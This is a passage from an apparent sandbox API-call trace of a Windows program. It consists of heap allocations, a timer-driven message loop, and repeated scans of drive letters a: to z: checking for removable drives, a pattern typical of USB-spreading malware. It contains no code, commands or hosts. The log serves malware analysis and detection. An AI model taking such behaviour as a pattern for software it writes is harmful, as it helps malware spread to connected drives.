(HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326040 [0218.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326040 | out: hHeap=0x12c0000) returned 1 [0218.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0218.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.957] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0218.957] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0218.957] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.957] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.957] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.958] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0218.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0218.958] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0218.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0218.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.958] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0218.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0218.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.958] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.958] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.959] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.959] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.959] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.959] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.959] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.959] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.959] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.960] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.960] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.960] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.974] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.974] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.974] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.975] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.975] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.975] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.975] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.976] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.976] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.976] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.976] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.976] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.976] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.976] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.977] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.977] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.977] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.977] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.978] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.978] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f40 [0218.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f40 | out: hHeap=0x12c0000) returned 1 [0218.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0218.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0218.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.979] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.979] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.979] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.979] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0218.979] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.979] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.979] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0218.979] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0218.979] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.979] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0218.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0218.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0218.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0218.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.980] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.980] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.980] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.980] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.980] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.981] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.981] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.981] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.981] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.981] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.982] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.982] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.982] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.982] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.982] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.982] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.983] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.983] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.983] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.984] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.984] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.984] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.984] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.984] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.984] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.985] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.985] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.985] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.985] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.985] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.985] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.985] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.985] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.986] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.986] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.986] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.986] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.986] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.986] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.986] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.986] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.986] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.986] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.987] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.987] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0218.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325dc0 [0218.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.987] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.987] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.987] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325dc0 | out: hHeap=0x12c0000) returned 1 [0218.987] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.987] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0218.987] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.987] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0218.988] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.988] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0218.988] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.988] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.988] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.988] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.988] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.988] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.988] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.988] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.988] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.988] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.988] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.988] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.988] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.988] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.989] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.989] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.989] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.989] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0218.989] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.989] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.989] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.989] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.989] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.989] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0218.989] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.989] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.989] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.989] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.989] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0218.989] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0218.989] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.989] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.989] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.990] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.990] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.990] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.990] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.990] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.990] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.991] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.991] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.991] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.991] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.991] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.991] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.992] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.992] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.992] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.992] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.992] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.993] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.993] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.993] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.993] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.993] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.993] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.994] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.994] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.994] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.994] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.994] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, 